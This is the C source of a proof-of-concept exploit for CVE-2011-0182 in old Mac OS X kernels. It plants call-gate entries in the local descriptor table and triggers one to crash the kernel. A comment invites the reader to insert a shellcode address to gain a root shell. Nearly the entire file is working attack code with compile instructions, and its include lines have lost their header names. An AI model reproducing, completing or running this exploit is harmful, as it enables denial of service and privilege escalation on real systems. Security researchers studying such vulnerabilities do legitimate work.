/* Mac OS X < 10.6.7 Kernel Panic Exploit CVE-2011-0182, Proof Of Concept Code Author - Chanam Park (hkpco) Date - 2011. 06 Contact - chanam.park@hkpco.kr , http://hkpco.kr , @hkpco Thanks for inspiration / x82, riaf. */ // Compile: gcc -o CVE-2011-0182_PoC CVE-2011-0182_PoC.c -m32 #include #include #include #include #include #include void dummy_func( void ) { asm volatile( ".byte 0xff" ); } int main( void ) { int ret; union ldt_entry cgate, cgate2; char dummy[128] = {0x00,}; cgate.call_gate.offset00 = (unsigned int)dummy_func & 0xffff; cgate.call_gate.offset16 = ((unsigned int)dummy_func >> 16) & 0xffff; // You can input shellcode address value here to get the root shell. /* I got the root shell before. But, It was tested on Hackintosh for AMD. :-p The normal system has a little different environment. I have no time for this anymore because of my summer break is over. So.. Good Luck! */ cgate.call_gate.argcnt = 0; cgate.call_gate.type = 0xc; // DESC_CALL_GATE cgate.call_gate.dpl = 3; cgate.call_gate.present = 1; cgate.call_gate.seg.rpl = 0; cgate.call_gate.seg.ti = 0; cgate.call_gate.seg.index = 16; cgate2.call_gate.offset00 = 0x0; cgate2.call_gate.seg.rpl = 0; cgate2.call_gate.seg.ti = 0; cgate2.call_gate.seg.index = 0; cgate2.call_gate.argcnt = 0; cgate2.call_gate.type = 0; cgate2.call_gate.dpl = 0; cgate2.call_gate.present = 1; cgate2.call_gate.offset16 = 0x0; printf( "// coded by Chanam Park (hkpco)\n\n" ); ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate, 1 ); printf( "Selector Number in LDT <1>: 0x%x\n", ret ); ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate2, 1 ); printf( "Selector Number in LDT <2>: 0x%x\n\n", ret ); printf( "If you run this program, it can possibly cause \"Kernel Panic\".\n" ); printf( "The program will be continued when you input any value.\n" ); printf( "-> " ); fflush(stdout); scanf( "%s", dummy ); asm volatile( "lcall $0x3f, $0x0" ); // Trigger return 0; }